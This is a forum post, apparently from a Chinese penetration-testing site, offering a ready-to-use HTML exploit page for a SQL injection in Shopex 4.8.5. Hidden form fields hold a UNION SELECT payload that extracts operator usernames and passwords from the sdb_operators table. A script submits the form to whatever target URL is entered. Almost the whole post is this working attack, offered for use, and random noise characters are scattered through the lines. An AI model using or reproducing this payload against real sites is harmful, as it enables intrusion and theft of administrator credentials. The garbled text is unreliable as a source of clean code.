<center>6 g9 [+ P* g9 ~- [
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
1 V }+ C- I, T g& K6 y<form action="" method="post" name="submit_url">% C# G; N2 K! k5 K7 d O, d( u0 K& S
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>2 r: E) }9 m. _8 M7 V
<input type="hidden" name="goods[goods_id]" value="3">
/ f$ _$ h4 {7 }% u9 O<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
" j z% S5 h0 v- G: _7 P<input type="submit" value="给我注入" onclick=fsubmit()>
" G4 x" t% `" r% l</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com% K, G/ P. a3 P9 O
% q( V1 O4 M) d7 _) J7 f& m& \$ R$ P! C<script> , _0 X. T5 B7 m
function fsubmit(){ 8 H+ d. J4 H0 G! p% P
form = document.forms[0];
! l% \) i- ~' k5 l& Q) `) Eform.action = form.url.value+'/?product-gnotify'; l& [/ B7 K. w* E
form.submit(); : d2 v5 l& N. p Z1 x2 C0 v
} $ E9 f6 t s& A* b% s
</script>
6 V% ^' s8 _! Q6 N7 j! y |
发表于 2013-1-23 09:20:52
收藏
支持
反对